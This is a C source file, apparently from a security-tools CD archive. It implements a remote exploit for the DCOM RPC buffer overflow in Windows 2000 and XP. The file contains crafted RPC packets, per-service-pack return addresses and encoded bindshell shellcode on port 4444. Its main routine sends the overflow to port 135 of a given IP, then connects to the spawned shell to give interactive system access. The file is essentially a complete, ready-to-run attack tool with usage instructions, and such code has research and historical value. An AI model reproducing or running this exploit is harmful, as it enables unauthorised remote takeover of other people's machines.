home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / rpc / windows / dcom.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  15KB  |  354 lines

---

1. /*
2.   DCOM RPC Overflow Discovered by LSD
3.    -> http://www.lsd-pl.net/files/get?WINDOWS/win32_dcom
4.    
5.   Based on FlashSky/Benjurry's Code
6.    -> http://www.xfocus.org/documents/200307/2.html
7.    
8.   Written by H D Moore <hdm [at] metasploit.com>
9.    -> http://www.metasploit.com/
10.    
11.   - Usage: ./dcom <Target ID> <Target IP>
12.   - Targets:
13.   -          0    Windows 2000 SP0 (english)
14.   -          1    Windows 2000 SP1 (english)
15.   -          2    Windows 2000 SP2 (english)
16.   -          3    Windows 2000 SP3 (english)
17.   -          4    Windows 2000 SP4 (english)
18.   -          5    Windows XP SP0 (english)
19.   -          6    Windows XP SP1 (english)
20.  
21. */
22.  
23. #include <stdio.h>
24. #include <stdlib.h>
25. #include <error.h>
26. #include <sys/types.h>
27. #include <sys/socket.h>
28. #include <netinet/in.h>
29. #include <arpa/inet.h>
30. #include <unistd.h>
31. #include <netdb.h>
32. #include <fcntl.h>
33. #include <unistd.h>
34.  
35. unsigned char bindstr[]={
36. 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
37. 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
38. 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
39. 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
40. 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
41.  
42. unsigned char request1[]={
43. 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
44. ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
45. ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
46. ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
47. ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
48. ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
49. ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
50. ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
51. ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
52. ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
53. ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
54. ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
55. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
56. ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
57. ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
58. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
59. ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
60. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
61. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
62. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
63. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
64. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
65. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
66. ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
67. ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
68. ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
69. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
70. ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
71. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
72. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
73. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
74. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
75. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
76. ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
77. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
78. ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
79. ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
80. ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
81. ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
82. ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
83. ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
84. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
85. ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
86. ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
87. ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
88. ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
89. ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
90. ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
91. ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
92. ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
93. ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
94. ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
95. ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
96. ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
97. ,0x00,0x00,0x00,0x00,0x00,0x00};
98.  
99. unsigned char request2[]={
100. 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
101. ,0x00,0x00,0x5C,0x00,0x5C,0x00};
102.  
103. unsigned char request3[]={
104. 0x5C,0x00
105. ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
106. ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
107. ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
108. ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
109.  
110.  
111.  
112. unsigned char *targets [] =
113.         {
114.             "Windows 2000 SP0 (english)",
115.             "Windows 2000 SP1 (english)",
116.             "Windows 2000 SP2 (english)",
117.             "Windows 2000 SP3 (english)",
118.             "Windows 2000 SP4 (english)",
119.             "Windows XP SP0 (english)",
120.             "Windows XP SP1 (english)",
121.              NULL                                                                                       
122.         };
123.         
124. unsigned long offsets [] = 
125.         {
126.             0x77e81674, 
127.             0x77e829ec, 
128.             0x77e824b5, 
129.             0x77e8367a, 
130.             0x77f92a9b, 
131.             0x77e9afe3,
132.             0x77e626ba,
133.         };
134.  
135. unsigned char sc[]=
136.     "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
137.     "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
138.     "\x46\x00\x58\x00\x46\x00\x58\x00"
139.  
140.     "\xff\xff\xff\xff" /* return address */
141.     
142.     "\xcc\xe0\xfd\x7f" /* primary thread data block */
143.     "\xcc\xe0\xfd\x7f" /* primary thread data block */
144.  
145.     /* port 4444 bindshell */
146.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
147.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
148.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
149.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
150.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
151.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
152.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
153.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
154.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
155.     "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
156.     "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
157.     "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
158.     "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
159.     "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
160.     "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
161.     "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
162.     "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
163.     "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81"
164.     "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
165.     "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
166.     "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
167.     "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
168.     "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
169.     "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
170.     "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
171.     "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
172.     "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
173.     "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
174.     "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
175.     "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
176.     "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
177.     "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
178.     "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
179.     "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
180.     "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
181.     "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
182.     "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
183.     "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
184.     "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
185.     "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
186.     "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
187.     "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";
188.  
189.    
190.  
191. unsigned char request4[]={
192. 0x01,0x10
193. ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
194. ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
195. ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
196. };
197.  
198.  
199. /* ripped from TESO code */
200. void shell (int sock)
201. {
202.         int     l;
203.         char    buf[512];
204.         fd_set  rfds;
205.  
206.  
207.         while (1) {
208.                 FD_SET (0, &rfds);
209.                 FD_SET (sock, &rfds);
210.  
211.                 select (sock + 1, &rfds, NULL, NULL, NULL);
212.                 if (FD_ISSET (0, &rfds)) {
213.                         l = read (0, buf, sizeof (buf));
214.                         if (l <= 0) {
215.                                 printf("\n - Connection closed by local user\n");
216.                                 exit (EXIT_FAILURE);
217.                         }
218.                         write (sock, buf, l);
219.                 }
220.  
221.                 if (FD_ISSET (sock, &rfds)) {
222.                         l = read (sock, buf, sizeof (buf));
223.                         if (l == 0) {
224.                                 printf ("\n - Connection closed by remote host.\n");
225.                                 exit (EXIT_FAILURE);
226.                         } else if (l < 0) {
227.                                 printf ("\n - Read failure\n");
228.                                 exit (EXIT_FAILURE);
229.                         }
230.                         write (1, buf, l);
231.                 }
232.         }
233. }
234.  
235.  
236. int main(int argc, char **argv)
237. {
238.     
239.     int sock;
240.     int len,len1;
241.     unsigned int target_id;
242.     unsigned long ret;
243.     struct sockaddr_in target_ip;
244.     unsigned short port = 135;
245.     unsigned char buf1[0x1000];
246.     unsigned char buf2[0x1000];
247.  
248.     printf("---------------------------------------------------------\n");
249.     printf("- Remote DCOM RPC Buffer Overflow Exploit\n");
250.     printf("- Original code by FlashSky and Benjurry\n");
251.     printf("- Rewritten by HDM <hdm [at] metasploit.com>\n");
252.  
253.  
254.     if(argc<3)
255.     {
256.         printf("- Usage: %s <Target ID> <Target IP>\n", argv[0]);
257.         printf("- Targets:\n");
258.         for (len=0; targets[len] != NULL; len++)
259.         {
260.             printf("-          %d\t%s\n", len, targets[len]);   
261.         }
262.         printf("\n");
263.         exit(1);
264.     }
265.  
266.     /* yeah, get over it :) */
267.     target_id = atoi(argv[1]);
268.     ret = offsets[target_id];
269.     
270.     printf("- Using return address of 0x%.8x\n", ret);
271.  
272.     memcpy(sc+36, (unsigned char *) &ret, 4);
273.  
274.     target_ip.sin_family = AF_INET;
275.     target_ip.sin_addr.s_addr = inet_addr(argv[2]);
276.     target_ip.sin_port = htons(port);
277.  
278.     if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
279.     {
280.         perror("- Socket");
281.         return(0);
282.     }
283.     
284.     if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0)
285.     {
286.         perror("- Connect");
287.         return(0);
288.     }
289.     
290.     len=sizeof(sc);
291.     memcpy(buf2,request1,sizeof(request1));
292.     len1=sizeof(request1);
293.     
294.     *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;  
295.     *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2;
296.     
297.     memcpy(buf2+len1,request2,sizeof(request2));
298.     len1=len1+sizeof(request2);
299.     memcpy(buf2+len1,sc,sizeof(sc));
300.     len1=len1+sizeof(sc);
301.     memcpy(buf2+len1,request3,sizeof(request3));
302.     len1=len1+sizeof(request3);
303.     memcpy(buf2+len1,request4,sizeof(request4));
304.     len1=len1+sizeof(request4);
305.     
306.     *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;
307.     
308.  
309.     *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;  
310.     *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;
311.     *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;
312.     *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;
313.     *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;
314.     *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;
315.     *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc;
316.     
317.     if (send(sock,bindstr,sizeof(bindstr),0)== -1)
318.     {
319.             perror("- Send");
320.             return(0);
321.     }
322.     len=recv(sock, buf1, 1000, 0);
323.     
324.     if (send(sock,buf2,len1,0)== -1)
325.     {
326.             perror("- Send");
327.             return(0);
328.     }
329.     close(sock);
330.     sleep(1);
331.     
332.     target_ip.sin_family = AF_INET;
333.     target_ip.sin_addr.s_addr = inet_addr(argv[2]);
334.     target_ip.sin_port = htons(4444);
335.  
336.     if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
337.     {
338.         perror("- Socket");
339.         return(0);
340.     }
341.     
342.     if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0)
343.     {
344.         printf("- Exploit appeared to have failed.\n");
345.         return(0);
346.     }   
347.     
348.     printf("- Dropping to System Shell...\n\n");
349.  
350.     shell(sock);
351.     
352.     return(0);
353. }
354.